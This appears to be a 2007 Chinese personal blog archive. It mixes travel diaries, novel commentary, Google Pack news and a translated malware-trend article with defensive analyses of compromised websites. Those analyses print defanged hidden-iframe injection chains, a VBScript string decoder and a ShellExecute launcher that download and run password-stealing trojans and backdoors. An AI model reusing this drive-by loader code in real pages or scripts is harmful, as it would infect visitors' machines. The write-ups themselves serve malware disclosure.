2007年3月30日星期五

诺顿安全扫描和Spyware Doctor Starter Edition加入Google大礼包

Google Pack是Google公司推出的一项服务，将一些他们认为必备的软件打成包提供免费下载，这些软件由统一的Google updater提供自动更新，省去用户逐一下载安装的麻烦。

今天，Google pack又增加了3位成员，其中一位为Google出品，另外两位为第三方的免费安全软件。首先是Google相片屏保，可以将您无论本地存储，还是Picasa网络相册或其他网络相册连接的照片以幻灯片的形式作为屏保。

第二位来自大名鼎鼎的赛门铁克，诺顿安全扫描（Norton Security Scan）提供基本的PC安全防护功能，可以自动监测和清除病毒或蠕虫，并提供自动更新和计划扫描。这一赛门铁克专为Google特供的版本完全免费。

另一位新成员来自PC Tools，名为Spyware Doctor Starter Edition。顾名思义，它也是一款较少功能的基础版安全软件，专门应对恶意软件和间谍软件，提供计划扫描，威胁移除，有限制的动态保护功能，并提供免费自动更新。

加入这三位新成员后，Google Pack进一步扩大，目前软件包括：

Google软件：

Google Earth
Google Desktop
Picasa
Google IE工具栏
Google相片屏保

第三方软件：

Firefox
Adobe Reader
Norton Security Scan
Spyware Doctor Starter Edition

可选软件：

Google Talk
Google Video Player
RealPlayer
GalleryPlayer HD Images
Skype

任意一款软件都可以随意添加或移除，Google Pack目前还处在beta阶段，并且还没有推出简体中文版。

Google Pack下载地址

诺顿安全扫描和Spyware Doctor Starter Edition加入Google大礼包

2007春节云南行——玉龙雪山·4680米·巅峰时刻

　　为了抵消沿途盖章所耗费的时间，偶拿着通关文牒先轻装出发，向海拔4680米的地方挺进……

　　栈道右边有椅子可供休息，不过我觉得还是不要坐为好，因为坐了一次，就会有第二次，第三次……浪费时间（胖金妹导游说游客在这一般只能呆半个小时），影响行进速度……途中遇到一个MM，上几级台阶就坐在台阶上埋头休息，偶第三次下来时她还未到达到4680米处……如果确实要休息，建议扶着栈道栏杆就行了，当然不要影响其它游客上下。

　　关于是否需要配备氧气罐，胖金妹导游说得有点玄机：氧气不能缓解高原反应，但可以救命……偶们团的人好像没有人配备这个东东。途中看见有的人一吸氧气就放不下氧气罐了，甚至抱着氧气罐躺在椅子上……偶想氧气吸完了咋办？

　　偶是扶着栈道栏杆，深呼吸，以轻灵的步伐匀速缓慢前进。
尽管海拨逐渐升高，但偶没有不良反应。

　　没有发现4546米处的牌子和盖章处，偶就继续前进。一路上一点风也没有，没有戴牛仔帽来确实是一个失误……

　　途中看见一位下来的游客GG的胸前金光耀眼，仔细一瞧发现是一块金牌，好奇地向他打听，他很和蔼地说，到达4680米处就有了。在这里人与人之间的关系，就像这里环境一样纯净和友善。胖金妹导游说玉龙雪山一天只允许5000人上来，全国这么多人，能在这儿相遇，真的是很有缘份了。我第一次看见那位上几级台阶就坐在台阶上埋头休息的MM时，虽然互不认识，但很自然问她上到4680米处了吗？她也很坦诚地说没有。后来我下来时遇到与偶同一个团的一位帅哥，也很自然鼓励他坚持，金牌在就上面等着他……（后来，我由于上下3次，到达索道下部站排队等返回甘海子的车时，其它团友都准备上车了，这位帅哥就偶插到他前面……）

　　在4636米盖章处有登山证卖，10元一本，因为知道4680米处有金牌，就没有买。

　　终于到要到达4680米，游客所能达到的最高处了……

　　在4680米处盖章处可以买金牌，把登山的日期和自己的名字刻在上面，30元一块……这儿的工作人员好像是藏族同胞，因为他们在把刻好的金牌递给我的同时还说扎西德乐……（还记得这句藏语的意思吗？）

　　到了这里，当然要在4680米指示牌前留影了。

　　注意看PP里的雪，有些是泛绿的……

　　盖章处竖立着一面鲜艳的国旗，戴着金牌站在国旗下，是不是更有到达最高点的自豪感呢？

2007年3月29日星期四

小心QQ信息中的网址传播Trojan-PSW.Win32.Delf.qc/Trojan.PSW.Liumazi.kr(2版)

endurer 原创

2007-03-29 第2版补充瑞星的回复
2007-03-28 第1版

QQ收到如下信息：
/---
看**被插，看少女激情，没有你看不到的，只有你想不到的，地址hxxp://www.luoliao*3***.info狼友们快来！ n(Z
---/

hxxp://www.luoliao*3***.info的主页包含代码：
/---
＜iframe src＝"hxxp://bbs.co**ocb***b*s.com/pic***.htm?18***88-1" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://bbs.co**ocb***b*s.com/pic***.htm?18***88-1包含代码：
/---
＜script src＝css.js＞＜/script＞
---/

css.js的内容为JavaScript脚本，主要功能是运行多重嵌套的自定义函数 gn(n)，利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 cha.exe，保存为 %windir%，文件名由下面的代码：
/---
var number＝Math.random()*n;return Math.round(number)+'.exe'
---/
随机生成，并利用Shell.Application 对象 Q 的 ShellExecute 方法执行命令：%windir%\system32\cmd.exe /c %windir%\*****.exe 来运行。

文件说明符 : D:\test\cha.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-27 23:44:53
修改时间 : 2007-3-27 23:44:54
访问时间 : 2007-3-27 0:0:0
大小 : 22445 字节 21.941 KB
MD5 : 689f4a7e2aba9ebedea00d3a9eacef6a

Kaspersky 报为 Trojan-PSW.Win32.Delf.qc。

主　题：	病毒上报邮件分析结果－流水单号:6229241
发件人：	"" <send@rising.net.cn>

尊敬的客户，您好！
您的邮件已经收到，感谢您对瑞星的支持。

我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：
1.文件名：cha.exe
病毒名：Trojan.PSW.Liumazi.kr

我们将在较新的19.16.32版本(瑞星2006的18.72.32版本)中处理解决，请您届时将您的瑞星软件升级到19.16.32(瑞星2006的18.72.32版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话，我们会推迟一到两版本后升级。

某博客网的rss2.asp力推5病毒（其中3个为灰鸽子）第3版

endurer 原创

2007-03-31 第3版补充瑞星的反应
2007-03-29 第2版补充kaspersky 的反应
2007-03-29 第1版

该博客网的rss2.asp包含代码：
/---
＜SCRIPT＞var Words="%*3*Cht*ml%3E%3Ciframe src%3D%22hxxp%3A%2F%2Fkmx%2E**zl**f*j**j%2Ecom%2Findex%2Ehtm%22 name%3D%22zhu%22 width%3D%220%22 height%3D%220%22 frameborder%3D%220%22%3E%3C%2Fhtml%3E%0D%0A%0D%0A%0D%0A";document.write(unescape(Words))＜/SCRIPT＞＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞
＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞
＜Iframe src="hxxp://zhang8**5*9**.g**o*1***.icpcn.com/ndex.htm" width="0" height="0" scrolling="no" frameborder="0"＞＜/iframe＞
---/

变量Words的值解密后的内容为：
/---
＜html＞＜iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"＞＜/html＞
";document.write(unescape(Words))＜/SCRIPT＞＜SCRIPT＞var Words="＜html＞＜iframe src="hxxp://k***m**x*.z***l*f**j*j.com/index.htm" name="zhu" width="0" height="0" frameborder="0"＞＜/html＞
---/

hxxp://k***m**x*.z***l*f**j*j.com/index.htm包含代码：
/---
＜iframe src="hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://k***m**x*.z***l*f**j*j.com/jb.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://www.z***l*f**j*j.com/321.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
＜iframe src="hxxp://www.z***l*f**j*j.com/123.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://www.m**h***5**5**.cn/g****z****/g****z****.htm中的脚本代码功能是用unescape()解码字符串值并输出。

输出内容为VBScript脚本，功能是使用自定义函数：
/---
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
---/
解密变量t的值并执行。

解密后的变量t值为VBScript脚本代码，功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 gz.exe，保存为 %temp%\leren.bat，并利用Shell.Application 对象 Q 的 ShellExecute 方法来运行。

文件说明符 : D:\test\gz.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:41:59
修改时间 : 2007-3-29 12:41:59
访问时间 : 2007-3-29 0:0:0
大小 : 387584 字节 378.512 KB
MD5 : 8b1e57e69f958e004fc743188e4f63c4

Kaspersky 报为 Backdoor.Win32.Hupigon.emk[KLAB-1900585]

瑞星报为 Backdoor.Gpigeon.sbi（病毒上报邮件分析结果－流水单号:6239851）

我们将在较新的19.16.42版本(瑞星2006的18.72.42版本)中处理解决，请您届时将您的瑞星软件升级到19.16.42(瑞星2006的18.72.42版本)版本并且打开监控中心全盘杀毒。如果我们在测试过程中发现问题的话，我们会推迟一到两版本后升级。

hxxp://k***m**x*.z***l*f**j*j.com/jb.htm（卡巴报为：Trojan-Downloader.VBS.Small.dc）内容为VBScript脚本代码，功能是输出信息：“你好，您所访问的页面正在加载中...请稍候片刻....”，同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 jb.exe，保存为 %temp%\svchost.exe，并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。

文件说明符 : D:\test\jb.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:39:40
访问时间 : 2007-3-29 0:0:0
大小 : 5632 字节 5.512 KB
MD5 : ee5a215b736b733ec2caed16fb413a29

Kaspersky 报为 Trojan.Win32.Agent.aic [KLAB-1900058]

瑞星报为 Trojan.Mnless.hpg（病毒上报邮件分析结果－流水单号:6239566）

hxxp://www.z***l*f**j*j.com/321.htm　内容为VBScript脚本代码，功能是输出信息：“你好，您所访问的页面正在加载中...请稍候片刻....”，同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 321.exe，保存为 %temp%\svchost.exe，并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。

文件说明符 : D:\test\321.exe
属性 : A---
语言 : 英语(美国)
文件版本 : 5.2.3790.1830
说明 : Generic Host Process for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.2.3790.1830
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : rpcs.exe
源文件名 : rpcs.exe
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:41:12
访问时间 : 2007-3-29 0:0:0
大小 : 109606 字节 107.38 KB
MD5 : 9adeac121907c9ea7ad2b1dad7834bc6

Kaspersky 报为 Trojan-PSW.Win32.QQRob.km

瑞星报为 Trojan.PSW.QQRobber.bkv（病毒上报邮件分析结果－流水单号:6239566）

hxxp://www.z***l*f**j*j.com/123.htm　内容为VBScript脚本代码，功能是输出信息：“你好，您所访问的页面正在加载中...请稍候片刻....”，同时利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 123.exe，保存为 %temp%\svchost.exe，并利用Shell.Application 对象 zhonghuae 的 ShellExecute 方法来运行。

文件说明符 : D:\test\123.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:39:38
修改时间 : 2007-3-29 12:43:34
访问时间 : 2007-3-29 0:0:0
大小 : 298121 字节 291.137 KB
MD5 : b6b5bd850c28a1843fc5195fa09d52c7

Kaspersky 报为 Backdoor.Win32.Hupigon.crx[KLAB-1900585]

瑞星报为 Trojan.Mnless.hpf（病毒上报邮件分析结果－流水单号:6239566）

hxxp://zhang8**5*9**.g**o*1***.icpcn.com/index.htm　（瑞星报为：Trojan.DL.VBS.Agent.clg）内容为JavaScript脚本代码，功能是用String.fromCharCode()解码变量t的值并输出。

解码后的变量t的值为VBScript脚本代码，功能是利用 Microsoft.XMLHTTP 和 scripting.FileSystemObject 下载文件 010.exe，保存为 %temp%\svchost.exe，并利用Shell.Application 对象 Xe 的 ShellExecute 方法来运行。

文件说明符 : d:\test\010.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-29 12:35:2
修改时间 : 2007-3-29 12:35:6
访问时间 : 2007-3-29 0:0:0
大小 : 413184 字节 403.512 KB
MD5 : 8181fd58e26227d57915fa25ce26234e

Kaspersky 报为 Backdoor.Win32.Hupigon.avg[KLAB-1900585]

瑞星报为 Backdoor.Gpigeon.sbg（病毒上报邮件分析结果－流水单号:6239423）

2007年3月27日星期二

大侠狄龙子 7回5 概要 endurer评注良珠未归文麟念徒怀方送信　采芹取食问梅如厕文麟失踪

第七回(5) 止水忽生波　人似孤鸾　空嗟丽质三生曾有约　心同流水　不恋落花

　　怀方见良珠一去未归，便替文麟带口信给即沈煌。吩咐采芹、问梅二侍婢小心侍候，不可离开文麟一步。
　　文麟想念淑华、司徒良珠和沈煌至月西夜深，采芹往取酒食，重行生火。问梅内急如厕，回来发现文麟不见，忽听远远传来一声厉啸……

endurer评注

　　有道法的人还用普通的柴灶?而司徒一家附近居然没有设置禁制?怀念《蜀山剑侠传》中的幻波池的五行禁制~

［人］辽东飞侠冯远春：以前虽在江湖无什恶迹，近二十年更知敛迹，非到万不得已不肯出手

［人］蔡三姑：性情刚愎，有她无人，自恃本领，乃父昔年门下徒党又多，内有几个能手并还奉有托孤之命，无事便罢，一旦有事，闻风即至。……言出必践，非可以常理论，性又固执残忍，惹翻了她，什么事都做得出，决非周兄所能应付。……说到必做，诡计多端

［人］采芹、问梅：二侍婢……甚是灵慧，武功也非寻常……蒙主人怜爱，学成武功剑术

［人］司徒良珠：平日娇惯，素不服人

［人］司徒兄妹：均有洁癖，厨房在房后山洞之内

旧雨楼·还珠楼主《大侠狄龙子》全文

2007年3月26日星期一

某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码

endurer 原创
2007-03-26 第1版

该网首页末被加入代码：
/---
＜iframe src＝"hxxp://w**.q**b*b****d.com/b**d*.htm?001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞＜iframe src＝"hxxp://www.m*m***ju**.net/bbs/t***j*.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞＜iframe src＝%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.m*m***ju**.net/bbs/t***j*.htm 包含代码：
/---
＜iframe src="hxxp://w.qbbd.com/bd.htm?001" width="0" height="0" frameborder="0"＞＜/iframe＞
---/

hxxp://w**.q**b*b****d.com/b**d*.htm?001 包含代码：
/---
＜iframe src＝"hxxp://w**.q**b*b****d.com/0.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://w**.q**b*b****d.com/0.htm （瑞星网页监控报为：Trojan.DL.VBS.Agent.clo）包含VBScript脚本代码，功能是用自定义函数：

function rechange(k)
s＝Split(k,",")
t＝""
For i ＝ 0 To UBound(s)
t＝t+Chr(eval(s(i)))
Next
rechange＝t
End Function

解密变量t的值并执行。

变量t解密后的值为VBScript脚本代码，功能是 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe，保存为 %temp%\svchost.exe，并创建内容为
/---
Set Shell ＝ Shell.Application
Shell.ShellExecute %temp%\svchost.exe "","","","open",0
---/
的文件svchost.vbs，通过Shell.Application 对象的 ShellExecute 方法来运行svchost.vbs，从而让%temp%\svchost.exe得已运行。

文件说明符 : D:\test\0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-26 20:40:47
修改时间 : 2007-3-26 20:41:0
访问时间 : 2007-3-26 0:0:0
大小 : 69037 字节 67.429 KB
MD5 : 35ecfe1014702d38a40a0b428679c06a

Scanned file: 0.rar - Infected

0.rar/0.exe - infected by Worm.Win32.Viking.jr

Statistics:

Known viruses:	285996	Updated:	26-03-2007
File size (Kb):	64	Virus bodies:	1
Files:	1	Warnings:	0
Archives:	1	Suspicious:	0

%68%74%74%70%3A%2F%2F%6*A%*2*E%74%6*8**%6*5%63%2E%6*3%6*E%2*F%7*7%77%6B%6*C%2F/%31%2*E%68*%74%6D即hxxp://j**.t**h*e***c.cn/w**w*k***l//1.htm
包含Javascript脚本代码，功能是用unescape解密并输出变量Words的值，Words解密后的值包含信息：＜!-- vml'exploit! --＞和shellcode 代码……

2007年3月25日星期日

2007春节云南行——玉龙雪山·通关文牒·4506米标志碑

　　透过上部索道站过道上、悬垂着冰锥的窗口，我惊喜地发现海拔5596米的扇子陡淋浴在阳光里，在蓝天的衬托下闪闪发光，好像在向我们眨眼……

　　在冰川公园的入口处，工作人员要给我们发放登山纪念卡，卡的背面是古纳西王国通关文牒，我们写下自己的名字，工作人员会帮我们写上东巴文……加上一套玉龙雪山名信片和一套书签，一共10元，比在甘海子候车室里买信封要实惠罢。而且通关文牒下方还有标有海拔6506米、4546米、4636米、4680米，当我们爬到这些高度，就可以在相应的位置盖章，很有纪念意义……

　　在发卡时，工作人员已经帮我们在4506米处盖了章。呵呵，我们已经到达了海拔4506米的高度了……

　　刚下缆车时，就听到游客在不停惊赞尖叫，步入冰川公园，终于明白为什么大家会这样了。因为迎接我们的银妆素裹、秀丽挺拔的山峰和皑皑白雪覆盖的平原，天空万里无云，深蓝一片，白雪、黑岩、蓝天，遵循三元色原则，为我们构造出一幅无法用语言描述的美丽风景。

　　一条松木栈道从入口处开始盘山而上，缀以行走其上的身著各色服装的旅客，显得格外醒目。在这条栈道旁有一座海拔4506米石质标志碑，一大堆人就围在那里霹雳啪啦的照个不停，我们也不例外。

　　接下来，我们将沿栈道向海拔4680米的地方前进……

2007年3月24日星期六

大侠狄龙子 7回4 概要 endurer评注大黄中套珊儿盗鹿麻尼传宝文麟暂留苦忆淑

第七回(4)
止水忽生波　人似孤鸾　空嗟丽质
三生曾有约　心同流水　不恋落花

　　施女说身世来历。兄妹二人果是司徒平、秦寒萼所生司徒怀方和司徒良珠。司徒兄妹随父母往宝城山访同道时，发现金丝神猱大黄和独角怪兽雪犀在山谷中恶斗，磨着父母收来守山。
　　大黄奉了良珠之命去擒鹿，归途遇陶珊儿拦路要一条鹿腿，双方动手，珊儿不敌，用计骗大黄把鹿放下，将其引往远处，然后悄悄赶回偷了一条鹿腿，藏在崖缝之内，故意引逗大黄。大黄想用死鹿诱珊儿出来，不料却引来了蔡三姑手下一班佃工使女和胖妇板刀婆马二娘。蔡三姑同两个朋友从前山风洞崖访友归来，见胖妇等惨败，用家传铁线蛇长筋所制套索套住大黄。大黄带着套索网兜逃到远处山壑之上，不小心坠向绝壑之中，被一株古松将索头挂住，不住长啸求援。
　　珊儿顿起不平之念，暗中跟到蔡家，乘隙放火，盗回死鹿，凭天生目力和嗅觉追寻大黄，遇一麻面矮尼，给两块神木并传授消灭网兜套索的方法。
　　大黄感珊儿救命之恩，常时往来，成为莫逆之交。
　　蔡三姑次日一早率人搜寻套索，误将珊儿认作真虎，上前动手，连冯村养的几只猛兽，俱被珊儿、大黄大败。
　　蔡三姑和司徒兄妹正要变脸，隐居冯村的辽东飞侠冯远春出来调解，约定谷口那片树林为界，两不相犯。文麟如不回去，一举两得。
　　文麟苦忆淑华，而司徒良珠婷婷倩影不时涌上心头，直睡到午后未申之交方始醒转。司徒怀方说司徒良珠，陪文麟到左侧一座小山亭入席。
　　文麟想淑华是否有知己天涯之感，又盼天佑司徒良珠，免蹈淑华覆辙。发现老松下仿佛有一人影闪过。这顿酒直吃至未申之交，良珠仍未回转。

endurer评注

/---
只为司徒兄妹年少气盛，不免喜事，偶随父母同往宝城山访一同道，发现两个异兽在山谷中恶斗，一个便是前见金丝神猱大黄，一个便是去年雪夜沈煌所见和珊儿恶斗的独角怪兽雪犀。小兄妹磨着父母收了回来，本意充作守山之用，二兽也颇通灵性，从不无故伤人，但都天性刚暴，决不受人欺侮。
---/
此处所述大黄的来历与第七回(3)中不同。
宝城山对面的幻波池曾是《蜀山剑侠传》中峨眉派道统的继承人，也是第一号人物李英琼的洞府。

/---
忽有一位老前辈来访，将两老夫妻连司徒兄妹一同约往峨眉前山解脱坡见一前辈神尼
---/
不知这位神尼是谁？

珊儿所遇麻面矮尼不知又是谁？

司徒家作为峨眉门人，用小鬟似不妥当。

［人］司徒平、秦寒萼：均是峨眉派有名剑侠，因受敌人暗算，坏了根基，仇敌又多，出死人生好几次，虽蒙几位前辈异人随时暗助，爱护非常，无如吃亏太大，命都难保，后仗一位老前辈以全力扶持，才免一场大劫，由危机一发之间逃出毒手。眼看一班同门和后进门人纷纷成道，自己仅保残生已是万幸，越想越难受。夫妻二人情爱又深，劫后重逢，相对悲哭了数日。屡经商计，才在本山觅一风景灵秀、地势隐僻之区一同隐修，长享清福，并遂瞻望宫墙之愿。在当地隐居才三十年，生了一子一女，男名司徒怀方，女名良珠。……便两老夫妻那大年纪，也似一对新婚的少年美眷。隐居山中，仗着地势隐僻，除本派老前辈简冰如和几个同道至交而外，向无外人登门。

［人］司徒怀方：是司徒平、秦寒萼大劫之后所生，年比文麟尚长二三岁。父母均是剑侠异人，又蒙峨眉派师长和诸老前辈恩怜，服过驻颜灵药和师门凝碧丹、小还丹等灵药，司徒兄妹年才二十几岁，看去固是容光焕发……武功剑术之外更喜文事

［人］司徒良珠：是司徒平、秦寒萼大劫之后所生，年比文麟尚长二三岁。父母均是剑侠异人，又蒙峨眉派师长和诸老前辈恩怜，服过驻颜灵药和师门凝碧丹、小还丹等灵药，司徒兄妹年才二十几岁，看去固是容光焕发

［兽］金丝神猱大黄：司徒兄妹随父母同往宝城山访一同道时发现，磨着父母收了回来，本意充作守山之用，二兽也颇通灵性，从不无故伤人，但都天性刚暴，决不受人欺侮。……奉有主人之命，不许伤人，尤其妇女，休说把人抓死，略加伤害，至少须打三百铁鞭，仗着身坚如钢……天性刚猛，又极好胜……具恶性，喜怒无常

［兽］独角怪兽雪犀：司徒兄妹随父母同往宝城山访一同道时发现，磨着父母收了回来，本意充作守山之用，二兽也颇通灵性，从不无故伤人，但都天性刚暴，决不受人欺侮。

［人］陶珊儿：一个身披虎皮头戴虎面的女童……乃离谷数十里白云窝慧昙神尼新收门人陶珊儿……虽然力大身轻，毕竟吃了身材矮小的亏，如非心思灵警……日常馋得难过，见了鸟兽又不敢杀，空自垂涎无计可施。……从小生长大雪山猛兽群中，乃母便是一个极猛恶的怪兽，天生异禀，素来胆大……想用兽语……本喜兽类，性又义侠……天生目力和那嗅觉……天生野性，向不欺侮善良……具恶性，喜怒无常……恶根未化，专喜侮弄恶人和山中猛兽

［人］慧昙神尼：长斋清修，禅关一坐往往三数十天，人和泥塑菩萨一般，连水都不吃一口，戒律又严，杀生最犯大忌

［人］板刀婆马二娘：形貌丑怪，又穿着一身短装皮衣裤

［地-峨眉］风洞崖

［宝］铁线蛇长筋套索：蔡三姑家传……套索乃南疆毒蛇铁线筋精工巧制，如被套上，越挣越紧，一会深嵌入骨，奇痛非常，再将皮肉勒破，便中蛇毒，见血必死……套处奇痒，半身酸麻……套索乃毒蛇脊筋所制，上有倒须钩刺，索又极细，如若抓紧上援，便觉痛痒非常……套索全是铁线蛇筋所制，多快刀斧均难斩断

［人］麻尼：年只三四十岁，一脸大麻子，穿着一件黑麻布的僧衣，下面赤着双脚……貌相虽丑，神情那么庄严自然，也不露出一点矜夸词色

［宝］神木：麻尼之物。两块形似檀香、约有一指多粗二寸来长的黑木块……将两块黑木用力连擦，自会发火，冒出油烟……本来烧时所发浓烟腥毒无比。幸这两块神木功能克制，所发异香能够解毒

［人］辽东飞侠冯远春：冯村为首隐居的人……年已九十开外，乃蔡三姑义父，为人机智，剑术武功均非寻常

［人］小鬟采芹：司徒家。

旧雨楼·还珠楼主《大侠狄龙子》全文

2007年3月23日星期五

[译]抗病毒软件供应商担心恶意软件生产速度

Anti-virus vendors worry about the pace of malware production

抗病毒软件供应商担心恶意软件生产速度

Date: March 19th, 2007
日期：2007年3月19日
Blogger: Tom Olzak
博客：Tom Olzak
翻译：endurer
Category: Security, Computer Crime, Identity Theft, Antivirus Research, Cybercrime, Hacking, Antivirus, Spyware, It Management, Internet, data theft
类别：安全，计算机犯罪，身份窃取，抗病毒研究，网络犯罪，黑客，抗病毒，间谍软件，IT管理，互联网，数据窃取

英文来源：http://blogs.techrepublic.com.com/security/?p=192&tag=nl.e064

Kaspersky Lab's Eugene Kaspersky and F-Secure's Mikko Hypponen spoke out about the growing difficulties in keeping up with cyber criminals. In a speech at CeBit in Hanover, Germany, Kaspersky stated flatly that, "If the growth in malware continues at the current pace, makers of anti-virus software may not be able to withstand the onslaught" (Andrej Sokolow, "Experts warn war against computer viruses could be lost as onslaught spreads", Gulf Times, 18 Mar 2007). Hypponen seconded Kasperky's concerns stating that it's getting very difficult to deal with the 40,000 suspected files received from customers each day.
卡巴斯基实验室的尤金·卡巴斯基和F-Secure的米克·哈普宁说到跟上电脑网络犯罪的困难正在增大。卡巴斯基在德国汉诺威信息技术及通信展览会（CeBIT）的演讲中坦言，“如果恶意软件的增长沿续当前的速度，抗病毒软件的研制者们可能经不起猛攻”（Andrej Sokolow，“专家警告抗计算机病毒战争在猛攻扩大时可能失败”，海湾时报，2007年3月18日）。哈普宁重申了卡巴斯基的忧虑，每天处理来自客户的40,000个可疑文件正变得越来越困难了。

《endurer注：1。keep up with:跟上
2。Gulf Times：海湾时报》

According to Sokolow's article, cyber-criminals have advantages that they exploit with ever-increasing frequency, including:
按照Sokolow的文章，电脑网络犯罪具有利用不断增加的漏洞的优势，包括：
《endurer注：1。ever increasing:不断增加的(日益提高的)》

The sheer volume of malware and the fact that criminal activity on the Internet knows no national borders make it almost impossible to effectively deal with malware threats. Kaspersky recommends creating an international police agency, similar to Interpol, to aid in intelligence gathering and across border sharing of information.
单是大堆的恶意软件和罪犯活动于无国界的互联网上的实际情况，使有效处理恶意软件威胁变得几乎不可能。卡巴斯基建议创建一个国际警察指挥机构，类似于国际警察组织，以帮助搜集情报和跨界信息共享。《endurer注：1。aid in:帮助(在...给予帮助,帮助)》
The innocence of humans [gullibility?] that allows criminals to trick them into installing malware on their machines, responding to phishing attacks, etc.
人的纯真[易受骗？]易受罪犯哄骗而在机器上安装恶意软件，响应网络钓鱼攻击，等等。
《endurer注：1。innocent of:没有…的
2。trick sb.into doing:哄骗某人做》
Malware production is turning into a worldwide industry. "[Criminal organizations] are paying programmers the kind of salary that I could never afford," said Natalya Kaspersky, co-founder of Kaspersky Lab.
恶意软件生产正转变为世界范围的产业。“[犯罪组织]正向程序们员支付我无法提供的薪资，”卡巴斯基实验室创始人娜塔莉亚·卡巴斯基说。
The cost of services delivered is low for malware producing companies. The systems, and the resources required to operate them, are provided by the infected home or business owner.
恶意软件生产公司支付服务成本低。而处理它们所需的系统，资源则是由被感染的家庭或企业自已提供。

2007年3月22日星期四

2007春节云南行——玉龙雪山·大索道上

在缆车上回望下部索道站

　　在鸣音览雪亭排队时，从耸立在亭旁的高度指示牌知道下部索道站的海拔是3356米，大索道由此往上运行，直至雪山主峰扇子陡正下方海拔4506米的上部索道站，路程大体分为两段，每段近二十分钟，全长2914米，号称“全亚洲最长”，垂直高差达1150米，是我国海拔最高的旅游客运索道。

　　刚登上索道的6人座豪华脱抱式全封闭缆车（前面坐3人，后面坐3人）的时候，大家都很兴奋，唧唧喳喳说个不停，但很快就被窗外景色吸引住了。

　　起初可以看到索道两侧茂密的针叶林，而白雪则像一条银蛇曲行于山脚林隙间；眼界也越来越开阔，甘海子、白水河等景观相继收入眼帘……远近山川层峦叠障，近浓远淡直至天边。

　　随着海拔的升高，温度的降低，林木逐渐稀少，但没有见到以杜鹃为主的灌木林（据说春夏时节，这里满山杜鹃齐放非常美丽）。因为雪铺地盖石，白雪黑石，色彩鲜明……

　　透过缆车的窗子看去，那雪看起来凝结似漆若腊，真的是“窗含西岭千秋雪”。

　　胖金妹导游已经向我们介绍过，这里的索道由丽江、香港、以及意大利三方合资兴建，采用意大利的技术，造价合美金六百多万，98年下半年开始启用的，安全舒适。

　　当半空中的缆车受风力的影响而晃悠起来时，偶不并担心，因为胖金妹导游向我们解释过，缆车在遇到大风时会自动停下，等风停了自动继续。

　　但跟偶乘坐同一缆车的一位MM可能是被摇摆的缆车给忽悠倒了，居然说缆车已经换了几次方位，其实根本没变。

　　到达索道上部站后，偶第一个走出缆车，感觉一切正常……并且还有一个惊喜的发现……

　　BTW，上面这些PP都截取自偶姐的录像。

一位网友的电脑疑似是中了Viking、灰鸽子等

endurer 原创

2007-03-22 第1版

今天收到一位网友的email，没说明电脑出现了什么问题，只有 HijackThis 的日志。

在日志中发现如下可疑项：

HijackThis_zww汉化版扫描日志 V1.99.1
保存于 21:09:06, 日期 2007-3-21
操作系统： Windows XP SP2 (WinNT 5.01.2600)
浏览器： Internet Explorer v6.00 SP2 (6.00.2900.2180)

O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

O4 - 启动项HKLM\\Run: [winform] E:\WINDOWS\winform.exe
O4 - 启动项HKLM\\Run: [cmdbcs] E:\WINDOWS\cmdbcs.exe

O4 - 启动项HKLM\\Run: [wsttrs] E:\WINDOWS\wsttrs.exe

O4 - 启动项HKCU\\Run: [System Boot Check] C:\windows\baba.exe
O4 - 启动项HKCU\\Run: [set] E:\WINDOWS\servicea.exe
O4 - 启动项HKCU\\Run: [6] E:\WINDOWS\iexpl0ra.exe
O4 - 启动项HKCU\\Run: [c] E:\WINDOWS\c0nima.exe
